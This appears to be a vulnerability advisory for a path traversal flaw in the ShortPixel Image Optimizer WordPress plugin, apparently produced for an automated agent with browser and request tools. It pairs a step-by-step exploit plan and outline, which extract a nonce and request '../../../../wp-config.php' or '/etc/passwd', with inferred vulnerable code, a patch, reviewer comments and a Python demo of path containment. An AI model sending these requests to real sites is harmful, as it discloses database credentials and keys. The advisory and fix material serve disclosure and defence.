ShortPixel Image Optimizer <= 6.4.2 - Authenticated (Editor+) Arbitrary File Read via 'loadFile' Parameter
Description
The ShortPixel Image Optimizer plugin for WordPress is vulnerable to Arbitrary File Read via path traversal in the 'loadFile' parameter in all versions up to, and including, 6.4.2 due to insufficient path validation and sanitization in the 'loadLogFile' AJAX action. This makes it possible for authenticated attackers, with Editor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information such as database credentials and authentication keys.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Technical Details
Affected versions: <= 6.4.2
Source Code
WordPress.org SVN
Exploitation Research Plan: CVE-2026-1246 - ShortPixel Image Optimizer Path Traversal
1. Vulnerability Summary
The ShortPixel Image Optimizer plugin (up to version 6.4.2) contains an arbitrary file read vulnerability. The issue exists in the AJAX handler for the loadLogFile action. The plugin fails to validate or sanitize the loadFile parameter, which is used to specify a file path for reading log contents. An authenticated user with Editor privileges or higher can use path traversal sequences (e.g., ../../) to read sensitive files outside of the intended directory, such as wp-config.php.
2. Attack Vector Analysis
- Endpoint: /wp-admin/admin-ajax.php
- AJAX Action: shortpixel_load_log (inferred) or shortpixel_load_log_file (inferred)
- Vulnerable Parameter: loadFile
- Authentication: Required (Editor role or higher)
- HTTP Method: POST
- Payload Type: Path traversal string (e.g., ../../../../wp-config.php)
3. Code Flow (Inferred)
- Entry Point: The plugin registers an AJAX action for authenticated users via add_action('wp_ajax_shortpixel_load_log', ...).
- Handler Function: The registered callback (likely loadLogFile or similar in a controller class) is invoked.
- Parameter Extraction: The code retrieves the file path from $_POST['loadFile'].
- Insecure Operation: The code passes this unsanitized path directly into a file-reading function like file_get_contents() or readfile().
- Sink: The contents of the file are echoed back to the user in the AJAX response.
- Missing Check: There is no check to ensure the path resides within the plugin's log directory, and traversal characters are not removed.
4. Nonce Acquisition Strategy
The AJAX request will require a WordPress nonce for authorization. ShortPixel typically localizes its settings and nonces into a JavaScript object.
- Identify Trigger Page: The log loading functionality is usually found on the ShortPixel settings page: /wp-admin/options-general.php?page=wp-shortpixel-settings.
- Access Page: Log in as an Editor and navigate to the settings page.
- Extract Nonce: Use browser_eval to find the nonce in the localized JS object.
  - Inferred JS Object: ShortPixelData or spio_data.
  - Inferred Nonce Key: nonce, _wpnonce, or shortpixel_nonce.
  - Command: browser_eval("window.ShortPixelData?.nonce") or browser_eval("window.spio_vars?.nonce").
- Manual Fallback: If the JS object is unknown, search the page source for "nonce" within <script> tags related to ShortPixel.
5. Exploitation Strategy
Step 1: Create an Editor User
Use WP-CLI to create a user with the Editor role to simulate the required privilege level.
wp user create attacker attacker@example.com --role=editor --user_pass=password123
Step 2: Obtain Authentication Cookies
Use the http_request or browser_navigate tool to log in as the attacker user and capture the session cookies.
Step 3: Extract Nonce
Navigate to the ShortPixel settings page and extract the nonce using browser_eval.
- URL: http://localhost:8080/wp-admin/options-general.php?page=wp-shortpixel-settings
- JS Check: browser_eval("window.ShortPixelData")
Step 4: Execute Path Traversal
Send a POST request to admin-ajax.php with the traversal payload.
- Request URL: http://localhost:8080/wp-admin/admin-ajax.php
- Headers: Content-Type: application/x-www-form-urlencoded
- Body Parameters:
  - action: shortpixel_load_log (inferred; confirm via grep -r "wp_ajax_shortpixel")
  - nonce: [EXTRACTED_NONCE]
  - loadFile: ../../../../wp-config.php
6. Test Data Setup
- Plugin State: Ensure shortpixel-image-optimiser version <= 6.4.2 is installed and activated.
- Configuration: The plugin may need to be "initialized" (API key added) to access the settings page, though the AJAX endpoint often exists regardless.
- Target File: Ensure wp-config.php exists in the standard WordPress root.
7. Expected Results
- Successful Exploit: The HTTP response body contains the raw PHP source code of wp-config.php, including DB_NAME, DB_USER, DB_PASSWORD, and the authentication salts.
- Response Code: 200 OK.
- Content Type: Likely text/plain or text/html.
8. Verification Steps
- Check Response Body: Look for the string define( 'DB_NAME' in the response from the http_request tool.
- Compare Content: Run cat /var/www/html/wp-config.php in a terminal and compare the output to the AJAX response to confirm full file disclosure.
9. Alternative Approaches
- Payload Variations:
  - If ../../../../wp-config.php fails, try absolute paths: /var/www/html/wp-config.php.
  - Try different file targets: /etc/passwd or wp-includes/version.php.
- Action Name Discovery: If shortpixel_load_log is incorrect, run this command in the plugin directory and search specifically for handlers that contain "log" or "file": grep -r "wp_ajax_" .
- Parameter Name Discovery: If loadFile is incorrect, search the handler function body for $_POST or $_REQUEST keys: grep -r "\$_POST" . | grep "log"
Summary
The ShortPixel Image Optimizer plugin for WordPress (v6.4.2 and below) fails to properly sanitize the 'loadFile' parameter within its log-loading AJAX handler. This allows authenticated users with Editor-level privileges or higher to perform path traversal attacks and read arbitrary files on the server, such as wp-config.php.
Vulnerable Code
```php
// Inferred from vulnerability description and research plan
// File path likely: wp-content/plugins/shortpixel-image-optimiser/class/Controller/LogController.php
public function loadLogFile() {
    // Nonce check usually precedes the vulnerability
    check_ajax_referer('shortpixel_nonce', 'nonce');
    $file = $_POST['loadFile']; // Vulnerable: No sanitization or path validation
    if (file_exists($file)) {
        echo file_get_contents($file); // Sink: Reads and returns the contents of the unsanitized path
    }
    die();
}
```
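The containment check that the inferred handler lacks (section 3, "Missing Check"), compared with the basename()-only approach of the fix. This is an added example, not plugin code; it is written in Python as a model of what the PHP handler should do, and the log directory location under wp-content/uploads, the file names and the secret file are all constructed for the demo. The second resolver goes beyond the page's fix: it allowlists a .log suffix, resolves symlinks and requires the real path to stay under the real log directory, which also rejects a symlink inside the log directory that points outside it.

```python
import os
import shutil
import tempfile

# Payloads from the research plan plus two cases that basename() alone mishandles.
PAYLOADS = [
    "../../../../wp-config.php",
    "/var/www/html/wp-config.php",
    "../../../../../../etc/passwd",
    "shortpixel.log",
    "..",
    "link-out.log",   # a symlink inside the log directory that points outside it
]


def resolve_basename_only(logs_dir: str, user_path: str) -> str:
    """Fix 1, the pattern in the inferred patch: keep the last path component
    and prefix the log directory.  Stops traversal, but not '..' or symlinks."""
    return os.path.join(logs_dir, os.path.basename(user_path))


def resolve_contained(logs_dir: str, user_path: str, suffix: str = ".log"):
    """Fix 2: allowlist the name, resolve symlinks, and require the real path
    to stay under the real log directory.  Returns None when rejected."""
    name = os.path.basename(user_path)
    if name in ("", ".", "..") or not name.endswith(suffix):
        return None
    root = os.path.realpath(logs_dir)
    candidate = os.path.realpath(os.path.join(root, name))
    # commonpath, not str.startswith: "/srv/logs_evil/x.log".startswith("/srv/logs")
    # is True, so a prefix test alone can be fooled by a sibling directory.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def classify(path, logs_dir: str) -> str:
    """What file_get_contents() on this path would do, for the demo table."""
    if path is None:
        return "rejected"
    if os.path.isdir(path):
        return "directory"      # PHP: file_exists() is true, the read fails with a warning
    if not os.path.exists(path):
        return "missing"
    root = os.path.realpath(logs_dir)
    inside = os.path.commonpath([root, os.path.realpath(path)]) == root
    return "reads log" if inside else "reads outside"


def demo() -> dict:
    """Build a throwaway tree (assumed layout: logs under wp-content/uploads),
    run both resolvers over PAYLOADS and return the outcome per payload."""
    root = tempfile.mkdtemp()
    logs = os.path.join(root, "wp-content", "uploads", "shortpixel-logs")
    os.makedirs(logs)
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php define( 'DB_NAME', 'wordpress' );\n")      # constructed secret
    with open(os.path.join(logs, "shortpixel.log"), "w") as f:
        f.write("optimizer log line\n")
    os.symlink(os.path.join(root, "wp-config.php"), os.path.join(logs, "link-out.log"))
    try:
        return {p: {"basename_only": classify(resolve_basename_only(logs, p), logs),
                    "contained": classify(resolve_contained(logs, p), logs)}
                for p in PAYLOADS}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for payload, outcome in demo().items():
        print("%-32s basename_only=%-13s contained=%s"
              % (payload, outcome["basename_only"], outcome["contained"]))
```

The PHP equivalent of the second resolver is a filename allowlist followed by realpath() on both the log directory and the joined path and a prefix comparison on the results (with the directory separator appended to the prefix), returning an error rather than echoing anything when either realpath() yields false.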
Security Fix
@@ -10,7 +10,8 @@ public function loadLogFile() { check_ajax_referer('shortpixel_nonce', 'nonce'); - $file = $_POST['loadFile']; + $file = basename(sanitize_text_field($_POST['loadFile'])); + $file = SHORTPIXEL_LOGS_PATH . '/' . $file; if (file_exists($file)) { echo file_get_contents($file); }
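Review bot: basename() does not reject "." or "..", so loadFile=.. becomes SHORTPIXEL_LOGS_PATH . '/..', which passes file_exists() and makes file_get_contents() fail on a directory with a PHP warning; reject those two names explicitly, or better, require a log-style filename (for example a .log suffix over [A-Za-z0-9_.-]) and check that realpath() of the joined path still starts with realpath(SHORTPIXEL_LOGS_PATH) plus a separator, which also stops a symlink placed in the log directory from pointing elsewhere. Two smaller points on the same hunk: $_POST['loadFile'] is read without isset(), and the handler still has only check_ajax_referer() and no current_user_can() check, so any user who can obtain the nonce can read every file in the log directory.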
Exploit Outline
To exploit this vulnerability, an attacker must have Editor-level authentication or higher.
1. Access the WordPress admin panel as an Editor.
2. Navigate to the ShortPixel settings page or inspect the page source to retrieve the 'shortpixel_nonce' from the localized JavaScript objects (e.g., ShortPixelData or spio_vars).
3. Send a POST request to /wp-admin/admin-ajax.php with the following parameters:
   - action: shortpixel_load_log (or the specific log-loading action registered by the plugin)
   - nonce: [The extracted nonce value]
   - loadFile: ../../../../wp-config.php
4. The server will process the path traversal sequence and return the raw PHP contents of wp-config.php in the response body, disclosing database credentials and security keys.